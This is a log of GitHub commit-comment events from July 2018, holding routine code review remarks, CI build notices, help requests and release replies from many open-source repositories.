{"id":"7963431021","type":"CommitCommentEvent","actor":{"login":"JesusEsquivel01"},"repo":{"name":"JesusEsquivel01/Hello-World"},"payload":{"comment":{"id":29702904,"position":null,"line":null,"path":null,"commit_id":"8d565a8228b9b5689fe42c83ec28d8583addf62c","created_at":"2018-07-13T17:33:50Z","updated_at":"2018-07-13T17:33:50Z","author_association":"OWNER","body":";)"}},"created_at":"2018-07-13T17:33:50Z"}
{"id":"7963432892","type":"CommitCommentEvent","actor":{"login":"okx-code"},"repo":{"name":"PiggyPiglet/TimeAPI"},"payload":{"comment":{"id":29702910,"position":null,"line":null,"path":null,"commit_id":"2f5127eab05cdba88c1fad64d4589a3ba471d8b6","created_at":"2018-07-13T17:34:15Z","updated_at":"2018-07-13T17:34:15Z","author_association":"NONE","body":"getMinutes(), getHours(), getDays(), getWeeks(), getMonths(), getYears() will return a whole number rather than the expected behaviour which is `new TimeAPI(\"30s\").getMinutes() == 0.5`, but instead this will return `0`."}},"created_at":"2018-07-13T17:34:15Z"}
{"id":"7963435267","type":"CommitCommentEvent","actor":{"login":"SilvaMendes"},"repo":{"name":"SilvaMendes/SBCC5"},"payload":{"comment":{"id":29702916,"position":null,"line":null,"path":null,"commit_id":"8ab4695baeaa0ddbd319d971accf13dad50e4f70","created_at":"2018-07-13T17:34:46Z","updated_at":"2018-07-13T17:34:46Z","author_association":"OWNER","body":"git osptoolkit"}},"created_at":"2018-07-13T17:34:46Z"}
{"id":"7963435478","type":"CommitCommentEvent","actor":{"login":"RazzorX"},"repo":{"name":"cmangos/wotlk-db"},"payload":{"comment":{"id":29702918,"position":13,"line":24525,"path":"ACID/acid_wotlk.sql","commit_id":"0727ca1ea373fa4e5cffb91f4940e35d3199ad02","created_at":"2018-07-13T17:34:49Z","updated_at":"2018-07-13T17:34:49Z","author_association":"CONTRIBUTOR","body":"Typo, this line should be changed to:\r\n\r\n`('2524405','25244','23','0','100','0','29266','1','0','0','18','256','0','0','18','512','0','0','0','0','0','0','Warsong Marksman - Set UnitFlags on Feign Death'),`"}},"created_at":"2018-07-13T17:34:49Z"}
{"id":"7963443017","type":"CommitCommentEvent","actor":{"login":"zhreshold"},"repo":{"name":"apache/incubator-mxnet"},"payload":{"comment":{"id":29702934,"position":5,"line":21,"path":"ci/docker/install/tensorrt.sh","commit_id":"36ccba1999d1d67437ac20e428707c98ffaba1c5","created_at":"2018-07-13T17:36:32Z","updated_at":"2018-07-13T17:36:32Z","author_association":"MEMBER","body":"better pin to gluoncv==0.2.0 since we are are still in early stage"}},"created_at":"2018-07-13T17:36:32Z"}
{"id":"7963444436","type":"CommitCommentEvent","actor":{"login":"pauldhein"},"repo":{"name":"ml4ai/delphi"},"payload":{"comment":{"id":29702937,"position":null,"line":null,"path":null,"commit_id":"70cd902c7143522970cd155da8ec302872cbca2c","created_at":"2018-07-13T17:36:52Z","updated_at":"2018-07-13T17:36:52Z","author_association":"COLLABORATOR","body":"👍\r\n\r\n@adarshp  I was thinking that any program which produces a graph as output should produce a DOT file and, then we should use other utilities (perhaps a specific utils program or different app) to view the created DOT files. This would allow Git to track changes to the DOT file as we change our program, which may be helpful for review purposes later on. What do you think?"}},"created_at":"2018-07-13T17:36:52Z"}
{"id":"7963446539","type":"CommitCommentEvent","actor":{"login":"carlhancock"},"repo":{"name":"wp-premium/gravityforms"},"payload":{"comment":{"id":29702943,"position":null,"line":null,"path":null,"commit_id":"42f34c40fc9ee8bff4f716e30ba87149cb33f28e","created_at":"2018-07-13T17:37:21Z","updated_at":"2018-07-13T17:37:21Z","author_association":"NONE","body":"@drzraf To sum it the above... if Github access with composer-friendly releases is something you (or other) developers need you should reach out to us and work with us to make it happen rather than working against us.  We want to make things easier for developers.  But we need to do things the right way from a legal, licensing and trademark standpoint.  \r\n\r\nCurrently the main Gravity Forms Github repo is not composer friendly because we have a build process that takes place as well as code tests and Travis CI build process that occurs.  It's not composer friendly out of the box because of that.  But a composer friendly repo is something we are open to exploring but it would have to be done in an official capacity from a licensing, trademark and IP standpoint because of the code changes that would need to take place to make it happen.\r\n\r\nAnother thing to note, you can interact and get Gravity Forms using WP-CLI.  Which is an alternative to pulling directly from Github via Composer.  I know that isn't ideal for everyone.  But it is something that is possible right now."}},"created_at":"2018-07-13T17:37:21Z"}
{"id":"7963453399","type":"CommitCommentEvent","actor":{"login":"MarkoTotti"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29702954,"position":null,"line":null,"path":null,"commit_id":"69e92ec52089bbbe32b8182a3c77addcb07204ae","created_at":"2018-07-13T17:38:55Z","updated_at":"2018-07-13T17:38:55Z","author_association":"NONE","body":"Hi,\r\nCan anyone help me with this problem?\r\n\r\nhttps://user-images.githubusercontent.com/41204964/42705646-44d592ae-86d4-11e8-9e46-801c3dd4a3d1.jpg\r\n"}},"created_at":"2018-07-13T17:38:55Z"}
{"id":"7963459608","type":"CommitCommentEvent","actor":{"login":"jbloom22"},"repo":{"name":"hail-is/hail"},"payload":{"comment":{"id":29702974,"position":18,"line":252,"path":"python/hail/expr/expressions/base_expression.py","commit_id":"8274d37821ba891a261718d1a723d5c107712a36","created_at":"2018-07-13T17:40:19Z","updated_at":"2018-07-13T17:40:19Z","author_association":"COLLABORATOR","body":"you left in a print statement"}},"created_at":"2018-07-13T17:40:19Z"}
{"id":"7963460793","type":"CommitCommentEvent","actor":{"login":"karnikram"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29702978,"position":51,"line":357,"path":"gui/CMainWindow.cpp","commit_id":"6931b825544acca912e0298e8c373a756cb6d37c","created_at":"2018-07-13T17:40:35Z","updated_at":"2018-07-13T17:40:35Z","author_association":"OWNER","body":"That's also a good option :)"}},"created_at":"2018-07-13T17:40:35Z"}
{"id":"7963462542","type":"CommitCommentEvent","actor":{"login":"ZwyC"},"repo":{"name":"ZwyC/term_ubidots"},"payload":{"comment":{"id":29702981,"position":13,"line":44,"path":"esp8266_term_ubidots_v3.2.ino","commit_id":"79eb1171f0da97c8636e89948d677564eb56c087","created_at":"2018-07-13T17:40:57Z","updated_at":"2018-07-13T17:40:57Z","author_association":"OWNER","body":"stupid move, better place is setup() function"}},"created_at":"2018-07-13T17:40:57Z"}
{"id":"7963468010","type":"CommitCommentEvent","actor":{"login":"Jocalinux"},"repo":{"name":"mattiabasone/tuning-primer"},"payload":{"comment":{"id":29702998,"position":null,"line":null,"path":null,"commit_id":"9a38370e514e5a91d5fc57ea6950d34bdc9df227","created_at":"2018-07-13T17:42:05Z","updated_at":"2018-07-13T17:42:05Z","author_association":"NONE","body":"The new block code in attached.\r\n\r\nNow, I can run the 'tuning-primer.sh' in RHEL 7x, CentOS 7x and earlier versions that not have the 'netstat' command installed.\r\n\r\n:+1: \r\n\r\n![screenshot from 2018-07-13 14-40-30](https://user-images.githubusercontent.com/39717641/42705756-be5bc12c-86aa-11e8-8513-252abad7a089.png)\r\n"}},"created_at":"2018-07-13T17:42:05Z"}
{"id":"7963468883","type":"CommitCommentEvent","actor":{"login":"cg505"},"repo":{"name":"josteink/csharp-mode"},"payload":{"comment":{"id":29703001,"position":null,"line":null,"path":null,"commit_id":"c66916ef5c2a73dce2cc2a0845ca47e8c8abb2f9","created_at":"2018-07-13T17:42:16Z","updated_at":"2018-07-13T17:42:16Z","author_association":"NONE","body":"Not sure if this change was meant to indicate the release of a new version, but if so, could you tag it so it's picked up by MELPA Stable? The current version on there (0.9.0) is incompatible with Emacs 26."}},"created_at":"2018-07-13T17:42:16Z"}
{"id":"7963473386","type":"CommitCommentEvent","actor":{"login":"vinothkannans"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29703012,"position":null,"line":null,"path":null,"commit_id":"06deffc9da5195049109d4e6fdc8842d0304d2b9","created_at":"2018-07-13T17:43:14Z","updated_at":"2018-07-13T17:43:14Z","author_association":"MEMBER","body":"I will add a spec test for this commit :memo:"}},"created_at":"2018-07-13T17:43:14Z"}
{"id":"7963477115","type":"CommitCommentEvent","actor":{"login":"tedmiston"},"repo":{"name":"astronomerio/db-bootstrapper"},"payload":{"comment":{"id":29703021,"position":null,"line":null,"path":null,"commit_id":"f2adf2f9e5579635692983ac2054692adb895d9c","created_at":"2018-07-13T17:44:04Z","updated_at":"2018-07-13T17:44:04Z","author_association":"MEMBER","body":"@schnie Did this one not work for you?  I tested it on my machine successfully."}},"created_at":"2018-07-13T17:44:04Z"}
{"id":"7963483426","type":"CommitCommentEvent","actor":{"login":"johnbocaligsage"},"repo":{"name":"sagetreesd/gonavis-franchising"},"payload":{"comment":{"id":29703031,"position":null,"line":null,"path":null,"commit_id":"24060f76ba0dd15745c840328abf3e224cd207e0","created_at":"2018-07-13T17:45:29Z","updated_at":"2018-07-13T17:45:29Z","author_association":"COLLABORATOR","body":"Created multidev environment [gonavis-franchising#ci-125](https://dashboard.pantheon.io/sites/bd2040d9-444e-4c2e-ad13-fd575701973a#ci-125).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-125-gonavis-franchising.pantheonsite.io/)"}},"created_at":"2018-07-13T17:45:29Z"}
{"id":"7963484615","type":"CommitCommentEvent","actor":{"login":"Mazda--"},"repo":{"name":"CypherOS/frameworks_base"},"payload":{"comment":{"id":29703033,"position":null,"line":null,"path":null,"commit_id":"d5f249f25fdc40c452f14f1b2bf45ccc335d6ace","created_at":"2018-07-13T17:45:41Z","updated_at":"2018-07-13T17:45:41Z","author_association":"CONTRIBUTOR","body":"Don't tag me anymore @iamchriskanger. This dot OS vs Cypher OS thing, that's between you guys. Figure it out...."}},"created_at":"2018-07-13T17:45:41Z"}
{"id":"7963486793","type":"CommitCommentEvent","actor":{"login":"Brian-Williams"},"repo":{"name":"Brian-Williams/tenacity"},"payload":{"comment":{"id":29703040,"position":14,"line":91,"path":"tenacity/retry.py","commit_id":"8d19588434e0ea90bb83f56615153adba617c9ea","created_at":"2018-07-13T17:46:04Z","updated_at":"2018-07-13T17:46:04Z","author_association":"OWNER","body":"This is a typo that would break this class if merged."}},"created_at":"2018-07-13T17:46:04Z"}
{"id":"7963487880","type":"CommitCommentEvent","actor":{"login":"miklos1"},"repo":{"name":"coneoproject/COFFEE"},"payload":{"comment":{"id":29703043,"position":null,"line":null,"path":null,"commit_id":"5a64937a5e3c841b78f4a73322319702ab58cd71","created_at":"2018-07-13T17:46:17Z","updated_at":"2018-07-13T17:46:17Z","author_association":"CONTRIBUTOR","body":"OK, so this solves the parenthesis issue mentioned in https://github.com/firedrakeproject/tsfc/pull/153/files#r202422988"}},"created_at":"2018-07-13T17:46:17Z"}
{"id":"7963490687","type":"CommitCommentEvent","actor":{"login":"lpdmagee"},"repo":{"name":"RBVI/CyPlot"},"payload":{"comment":{"id":29703050,"position":null,"line":null,"path":null,"commit_id":"b2c501cd2138a17cf805f632da1166c78fd32a55","created_at":"2018-07-13T17:46:56Z","updated_at":"2018-07-13T17:46:56Z","author_association":"COLLABORATOR","body":"So it turns out that the issues were in the HTML code provided. Also, note that CyBrowser can take in either the HTML or the URL, so it's important to only provide one of those two things– in our case, that's HTML, not the URL. Unfortunately this commit is probably useful largely to me, since it opens a scatter plot."}},"created_at":"2018-07-13T17:46:56Z"}
{"id":"7963492906","type":"CommitCommentEvent","actor":{"login":"jirutka"},"repo":{"name":"alpinelinux/aports"},"payload":{"comment":{"id":29703054,"position":29702134,"line":null,"path":"testing/aports-ghpr/APKBUILD","commit_id":"d102e6e0f490f27a3d320f62f1d04e84b5facbc0","created_at":"2018-07-13T17:47:25Z","updated_at":"2018-07-13T17:47:25Z","author_association":"MEMBER","body":"@ncopa Indeed this is wrong. You violates the rule about reproducible builds in regards to dependencies. It also violates the rule about downloading stuff from the Internet during build, moreover without any verification. Such package would not be acceptable for any Linux distribution with some QC (e.g. Fedora, openSUSE, even Debian).\n\nHave you looked at Alpine [wiki](https://wiki.alpinelinux.org/wiki/APKBUILD_examples:Go)? There's are no exact examples of correct abuilds, but at least there's explained why you should not do exactly what you did here and there's also mentioned the Glide tool. This should be enough for Alpine core developer to figure out what to do. Moreover, there are already many abuilds for some Go stuff using Glide. There are even many contributors who has experience with packaging Go stuff and do it right.\n\nThis commit is a subject for reverting due to violation of very basic principle of packaging. I've already reverted many aports in past for this exact reason."}},"created_at":"2018-07-13T17:47:25Z"}
{"id":"7963493474","type":"CommitCommentEvent","actor":{"login":"n-t-roff"},"repo":{"name":"n-t-roff/heirloom-doctools"},"payload":{"comment":{"id":29703055,"position":null,"line":null,"path":null,"commit_id":"fd2816bbce0e5f8830e5c977cdaf8d322d84db10","created_at":"2018-07-13T17:47:33Z","updated_at":"2018-07-13T17:47:33Z","author_association":"OWNER","body":"There is a difference in `propchar()`: `n-t-roff` has the line\r\n```\r\nif (tpp < &tp[NSENT-1])\r\n```\r\nwhile `typo-tests` has\r\n```\r\nif (tpp < &tp[NSENT])\r\n```"}},"created_at":"2018-07-13T17:47:33Z"}
{"id":"7963493804","type":"CommitCommentEvent","actor":{"login":"regislebrun"},"repo":{"name":"sofianehaddad/openturns"},"payload":{"comment":{"id":29703059,"position":16,"line":2635,"path":"lib/src/Uncertainty/Model/DistributionImplementation.cxx","commit_id":"7b498d959ae93b3920d99beeeb45e23756506aa2","created_at":"2018-07-13T17:47:38Z","updated_at":"2018-07-13T17:47:38Z","author_association":"NONE","body":"or:\r\n```\r\nreturn Point(1, std::sqrt(getCovariance()(0, 0));\r\n```\r\nwhich is more concise and do the exact same thing (ie delegates to specific implementation of computeCovariance(), takes care of the cached computation, and reduces to a call to computeCenteredMoment(2) if computeCovariance() has not been overloaded)."}},"created_at":"2018-07-13T17:47:38Z"}
{"id":"7963498380","type":"CommitCommentEvent","actor":{"login":"josteink"},"repo":{"name":"josteink/csharp-mode"},"payload":{"comment":{"id":29703067,"position":null,"line":null,"path":null,"commit_id":"c66916ef5c2a73dce2cc2a0845ca47e8c8abb2f9","created_at":"2018-07-13T17:48:43Z","updated_at":"2018-07-13T17:48:43Z","author_association":"OWNER","body":"Oh, is that so? That’s no good! I’ll have it fixed in no-time. \n\nThanks for reporting it!"}},"created_at":"2018-07-13T17:48:43Z"}
{"id":"7963503024","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29703079,"position":null,"line":null,"path":null,"commit_id":"ec21ff7b361c5adc2f59a611148672966e7dcab8","created_at":"2018-07-13T17:49:46Z","updated_at":"2018-07-13T17:49:46Z","author_association":"NONE","body":"## Global\n\n| Changed            |   Status |\n|:-------------------|---------:|\n| `coverage`         |     0.06 |\n| `metadata_passing` |     1    |\n| `metadata_total`   |    -6    |\n| `texts_total`      |    -2    |\n\n## Units\n\n| Changed                                                 | Status   |\n|:--------------------------------------------------------|:---------|\n| `./data/phi0010/__cts__.xml`                            | Deleted  |\n| `./data/phi0010/tlg001/__cts__.xml`                     | Deleted  |\n| `./data/phi0010/tlg0010/__cts__.xml`                    | Deleted  |\n| `./data/tlg0006/tlg002/__cts__.xml`                     | Deleted  |\n| `./data/tlg0014/tlg002/__cts__.xml`                     | Deleted  |\n| `./data/tlg0014/tlg003/__cts__.xml`                     | Deleted  |\n| `./data/tlg0019/tlg006/tlg0019.tlg006.perseus-grc1.xml` | Deleted  |\n| `./data/tlg0035/tlg001/tlg0035.tlg001.perseus-grc1.xml` | Deleted  |\n| `./data/tlg0006/tlg011/__cts__.xml`                     | Passing  |\n| `./data/tlg0019/tlg006/__cts__.xml`                     | Passing  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4450)*\n"}},"created_at":"2018-07-13T17:49:46Z"}
{"id":"7963505634","type":"CommitCommentEvent","actor":{"login":"moz4r"},"repo":{"name":"MyRobotLab/myrobotlab"},"payload":{"comment":{"id":29703083,"position":23,"line":207,"path":"src/main/java/org/myrobotlab/service/WebkitSpeechRecognition.java","commit_id":"76d8b114a7804db03418105b4f57f47ad72b5ae4","created_at":"2018-07-13T17:50:20Z","updated_at":"2018-07-13T17:50:20Z","author_association":"CONTRIBUTOR","body":"Loool and shutdown the tv also . tks checked "}},"created_at":"2018-07-13T17:50:20Z"}
{"id":"7963506010","type":"CommitCommentEvent","actor":{"login":"adarshp"},"repo":{"name":"ml4ai/delphi"},"payload":{"comment":{"id":29703084,"position":null,"line":null,"path":null,"commit_id":"70cd902c7143522970cd155da8ec302872cbca2c","created_at":"2018-07-13T17:50:25Z","updated_at":"2018-07-13T17:50:25Z","author_association":"COLLABORATOR","body":"It's certainly a good idea to have a function that can output a DOT file that we can inspect/manipulate using external tools. However, I would still like to keep only 'human-generated' things in the repo as much as possible (source code, and data required to execute the source code)\r\n\r\nThat being said, if you feel strongly about having the DOT files versioned for review, we could version them in the `pa_dev` branch, and make sure they don't make it to `master` by doing a `git rm <dotfile_name>` and making sure to squash the `pa_dev` commits before merging."}},"created_at":"2018-07-13T17:50:25Z"}
{"id":"7963515747","type":"CommitCommentEvent","actor":{"login":"serdzik"},"repo":{"name":"abeatte/android-betterpickers"},"payload":{"comment":{"id":29703110,"position":1,"line":18,"path":".gitignore","commit_id":"a0931ef5c8c5e21cf0d0053de50e981a578722ec","created_at":"2018-07-13T17:52:32Z","updated_at":"2018-07-13T17:52:32Z","author_association":"NONE","body":" a0931ef"}},"created_at":"2018-07-13T17:52:32Z"}
{"id":"7963516562","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29703113,"position":null,"line":null,"path":null,"commit_id":"afe786a4e56f42ae93a80389072690b299706af3","created_at":"2018-07-13T17:52:43Z","updated_at":"2018-07-13T17:52:43Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.219`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*CircleCI*](https://circleci.com/gh/streamich/ci-scripts/219) :tada:"}},"created_at":"2018-07-13T17:52:43Z"}
{"id":"7963516856","type":"CommitCommentEvent","actor":{"login":"taiwokaffo"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29703115,"position":null,"line":null,"path":null,"commit_id":"93f39efe3ef0ce9c25ef09ebef60ad2dfc1fe7f3","created_at":"2018-07-13T17:52:47Z","updated_at":"2018-07-13T17:52:47Z","author_association":"NONE","body":"Hello Mosh,\r\n\r\nhope this meets you well, i will love it if you can help with this error trace. deleted the required attribute of Genre and i left the one for GnereId because i had all of them on the required annotation, afterwards i did the EF add migration and update-database. the error i get is this below and when i rerun the app i find it has added to the DB because it will list it out int he movie list .\r\n\r\n\r\n\r\n![image](https://user-images.githubusercontent.com/19803216/42706199-e698fb1e-86cd-11e8-860d-8826b102e642.png)\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-13T17:52:47Z"}
{"id":"7963523286","type":"CommitCommentEvent","actor":{"login":"cnovak"},"repo":{"name":"cnovak/devportal-d8"},"payload":{"comment":{"id":29703127,"position":null,"line":null,"path":null,"commit_id":"72d693e51587a248f1420ce556e84c6e71992be8","created_at":"2018-07-13T17:54:16Z","updated_at":"2018-07-13T17:54:16Z","author_association":"OWNER","body":"Created multidev environment [devportal-d8#pr-1](https://dashboard.pantheon.io/sites/e91898da-a1b9-4579-bb26-27574c65d835#pr-1).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-1-devportal-d8.pantheonsite.io/)"}},"created_at":"2018-07-13T17:54:16Z"}
{"id":"7963524181","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/ci-scripts"},"payload":{"comment":{"id":29703129,"position":null,"line":null,"path":null,"commit_id":"afe786a4e56f42ae93a80389072690b299706af3","created_at":"2018-07-13T17:54:28Z","updated_at":"2018-07-13T17:54:28Z","author_association":"OWNER","body":"Build version: __`0.10.0-master.332`__ :crossed_fingers: [`master`](https://github.com/streamich/ci-scripts/tree/master) on [*Travis*](https://travis-ci.org/streamich/ci-scripts/builds/403665740) :tada:"}},"created_at":"2018-07-13T17:54:28Z"}
{"id":"7963524289","type":"CommitCommentEvent","actor":{"login":"cwsmith"},"repo":{"name":"SCOREC/EnGPar"},"payload":{"comment":{"id":29703131,"position":11,"line":14,"path":"partition/Coloring/engpar_coloring_input.h","commit_id":"006c59e8b633b2247c2444f06ac222ca8aa7ed72","created_at":"2018-07-13T17:54:29Z","updated_at":"2018-07-13T17:54:29Z","author_association":"CONTRIBUTOR","body":"Please remove commented code."}},"created_at":"2018-07-13T17:54:29Z"}
{"id":"7963524400","type":"CommitCommentEvent","actor":{"login":"easyly471"},"repo":{"name":"easyly471/project_zero"},"payload":{"comment":{"id":29703132,"position":null,"line":null,"path":null,"commit_id":"68d05dd33c73f86b22137f1c7ade2134caf85ca1","created_at":"2018-07-13T17:54:31Z","updated_at":"2018-07-13T17:54:31Z","author_association":"OWNER","body":"Hayir bari f-sting kullansaydin amk bosuna mi yukledin py3.6 yi"}},"created_at":"2018-07-13T17:54:31Z"}
{"id":"7963524852","type":"CommitCommentEvent","actor":{"login":"tugojheraldo"},"repo":{"name":"tugojheraldo/SI-LA-VEO"},"payload":{"comment":{"id":29703134,"position":2,"line":2,"path":"README.md","commit_id":"327e2bd542d9e44a77d51c20d950711283123015","created_at":"2018-07-13T17:54:36Z","updated_at":"2018-07-13T17:54:36Z","author_association":"OWNER","body":"def  DecimalAHexadecimal (): \r\n    decimal =  int ( entrada ( \" Ingrese un número positivo para convertirlo a hexadecimal: \" )) \r\n    hexadecimal =  \" \"  \r\n    mientras decimal ! =  0 :\r\n        rem = CambiarDigitos (decimal %  16 )\r\n        hexadecimal =  str (rem) + hexadecimal\r\n        decimal =  int (decimal /  16 )\r\n    print ( \" Resultado: \"  + hexadecimal)\r\n\r\ndef  CambiarDigitos ( digitos ): \r\n    decimales =      [ 10 , 11 , 12 , 13 , 14 , 15 ]\r\n    hexadecimal = [ \" A \" , \" B \" , \" C \" , \" D \" , \" E \" , \" F \" ]\r\n    para c en el  rango ( 7 ):\r\n        si digitos == decimales [c -  1 ]:\r\n            digitos = hexadecimal [c -  1 ]\r\n    regresar digitos\r\n\r\nDecimalAHexadecimal ()"}},"created_at":"2018-07-13T17:54:36Z"}
{"id":"7963526931","type":"CommitCommentEvent","actor":{"login":"weissi"},"repo":{"name":"gottesmm/swift"},"payload":{"comment":{"id":29703144,"position":null,"line":null,"path":null,"commit_id":"90673ce3de00283189a17e1a44803adb170816d4","created_at":"2018-07-13T17:55:04Z","updated_at":"2018-07-13T17:55:04Z","author_association":"NONE","body":"❤"}},"created_at":"2018-07-13T17:55:04Z"}
{"id":"7963527363","type":"CommitCommentEvent","actor":{"login":"serdzik"},"repo":{"name":"github/explore"},"payload":{"comment":{"id":29703146,"position":6,"line":6,"path":"topics/3d/3d.md","commit_id":"6c6508f34230f0ac0d49e847a326429eefbfc030","created_at":"2018-07-13T17:55:10Z","updated_at":"2018-07-13T17:55:10Z","author_association":"NONE","body":" a0931ef"}},"created_at":"2018-07-13T17:55:10Z"}
{"id":"7963529077","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29703148,"position":null,"line":null,"path":null,"commit_id":"ee180c57ba07a13b087f669889a842078a5e628d","created_at":"2018-07-13T17:55:33Z","updated_at":"2018-07-13T17:55:33Z","author_association":"NONE","body":"kiva-non-quad-walls (nealkruis) - x86_64-MacOS-10.9-clang: OK (2934 of 2934 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee180c57ba07a13b087f669889a842078a5e628d-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ee180c57ba07a13b087f669889a842078a5e628d-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-13T17:55:33Z"}
{"id":"7963534710","type":"CommitCommentEvent","actor":{"login":"Ademir1337"},"repo":{"name":"Ademir1337/modulogit"},"payload":{"comment":{"id":29703162,"position":null,"line":null,"path":null,"commit_id":"9e461cc7934ad2aaf0b704b6958922974099066a","created_at":"2018-07-13T17:56:51Z","updated_at":"2018-07-13T17:56:51Z","author_association":"OWNER","body":"Criando o gitignore"}},"created_at":"2018-07-13T17:56:51Z"}
{"id":"7963535091","type":"CommitCommentEvent","actor":{"login":"josteink"},"repo":{"name":"josteink/csharp-mode"},"payload":{"comment":{"id":29703164,"position":null,"line":null,"path":null,"commit_id":"c66916ef5c2a73dce2cc2a0845ca47e8c8abb2f9","created_at":"2018-07-13T17:56:56Z","updated_at":"2018-07-13T17:56:56Z","author_association":"OWNER","body":"And done: https://github.com/josteink/csharp-mode/tree/v0.9.1\r\n\r\nExpect it on MELPA Stable soon."}},"created_at":"2018-07-13T17:56:56Z"}
{"id":"7963538542","type":"CommitCommentEvent","actor":{"login":"cnovak"},"repo":{"name":"cnovak/devportal-d8"},"payload":{"comment":{"id":29703170,"position":null,"line":null,"path":null,"commit_id":"9214951619ec4dc3188ccb657b8ccd2dd809169c","created_at":"2018-07-13T17:57:43Z","updated_at":"2018-07-13T17:57:43Z","author_association":"OWNER","body":"Created multidev environment [devportal-d8#ci-33](https://dashboard.pantheon.io/sites/e91898da-a1b9-4579-bb26-27574c65d835#ci-33).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-33-devportal-d8.pantheonsite.io/)"}},"created_at":"2018-07-13T17:57:43Z"}
{"id":"7963538608","type":"CommitCommentEvent","actor":{"login":"punamdahiya"},"repo":{"name":"chenba/screenshots"},"payload":{"comment":{"id":29703171,"position":31,"line":105,"path":"server/src/pages/shot/text-tool.js","commit_id":"161cec9d513b15d0ed33d8d4c63d618ef4b581a6","created_at":"2018-07-13T17:57:44Z","updated_at":"2018-07-13T17:57:44Z","author_association":"NONE","body":"@chenba Any specific reason, we are using onMove instead of onMouseMove. I am seeing below warnign in console on click of Add Text\r\nWarning: Unknown event handler property `onMove`. It will be ignored\r\n\r\nI can change it to onMouseMove in the  PR with fix of #4624 to get rid of this warning"}},"created_at":"2018-07-13T17:57:44Z"}
{"id":"7963539204","type":"CommitCommentEvent","actor":{"login":"kcbaltz"},"repo":{"name":"kcbaltz/orca"},"payload":{"comment":{"id":29703172,"position":5,"line":115,"path":"orca-clouddriver/src/main/groovy/com/netflix/spinnaker/orca/clouddriver/tasks/servergroup/ServerGroupCacheForceRefreshTask.groovy","commit_id":"3607e7252a3d70636137aa0973e9427de2194ce7","created_at":"2018-07-13T17:57:53Z","updated_at":"2018-07-13T17:57:53Z","author_association":"OWNER","body":"Isn't this logic backwards?  If any of the forceCacheUpdates returns 200, it will act as if they all did.  Unless that's the behavior your want, I think this variable should start out true and be set to false if any of them return 202 (or not 200).  "}},"created_at":"2018-07-13T17:57:53Z"}
{"id":"7963539356","type":"CommitCommentEvent","actor":{"login":"geoperez"},"repo":{"name":"unosquare/tubular-react"},"payload":{"comment":{"id":29703173,"position":18,"line":13,"path":"src/DataSource/LocalDataSourceResponse.ts","commit_id":"518a11d316bd4d8d88a3fc9a31dc289b96bfa065","created_at":"2018-07-13T17:57:55Z","updated_at":"2018-07-13T17:57:55Z","author_association":"MEMBER","body":"Remove the try/catch"}},"created_at":"2018-07-13T17:57:55Z"}
{"id":"7963539457","type":"CommitCommentEvent","actor":{"login":"schnie"},"repo":{"name":"astronomerio/db-bootstrapper"},"payload":{"comment":{"id":29703174,"position":null,"line":null,"path":null,"commit_id":"f2adf2f9e5579635692983ac2054692adb895d9c","created_at":"2018-07-13T17:57:57Z","updated_at":"2018-07-13T17:57:57Z","author_association":"MEMBER","body":"Yea I tried it last night too and could never get it to work."}},"created_at":"2018-07-13T17:57:57Z"}
{"id":"7963541979","type":"CommitCommentEvent","actor":{"login":"josteink"},"repo":{"name":"josteink/csharp-mode"},"payload":{"comment":{"id":29703179,"position":null,"line":null,"path":null,"commit_id":"c66916ef5c2a73dce2cc2a0845ca47e8c8abb2f9","created_at":"2018-07-13T17:58:30Z","updated_at":"2018-07-13T17:58:30Z","author_association":"OWNER","body":"And done: https://github.com/josteink/csharp-mode/tree/v0.9.2\r\n\r\nExpect it on MELPA Stable soon."}},"created_at":"2018-07-13T17:58:30Z"}
{"id":"7963542916","type":"CommitCommentEvent","actor":{"login":"oaorottiw"},"repo":{"name":"frk1/hazedumper"},"payload":{"comment":{"id":29703183,"position":null,"line":null,"path":null,"commit_id":"59749e4e675adb44ae3af20f195c1107d3cf6b58","created_at":"2018-07-13T17:58:43Z","updated_at":"2018-07-13T17:58:43Z","author_association":"NONE","body":"update the csgo.cs, my wallhack need thissssssssssssssssss"}},"created_at":"2018-07-13T17:58:43Z"}
{"id":"7963543071","type":"CommitCommentEvent","actor":{"login":"n-t-roff"},"repo":{"name":"n-t-roff/heirloom-doctools"},"payload":{"comment":{"id":29703184,"position":null,"line":null,"path":null,"commit_id":"fd2816bbce0e5f8830e5c977cdaf8d322d84db10","created_at":"2018-07-13T17:58:46Z","updated_at":"2018-07-13T17:58:46Z","author_association":"OWNER","body":"@reffort From a first look at diff between `n-t-roff` and `typo-tests` I don't see major differences. Do you have a guess which source files may cause the issues?\r\n\r\nAh, I see that the test file had not been done with your final version. Could you please prepare an up-to-date test file with your final source version? I don't have any non-free fonts, unfortunately."}},"created_at":"2018-07-13T17:58:46Z"}
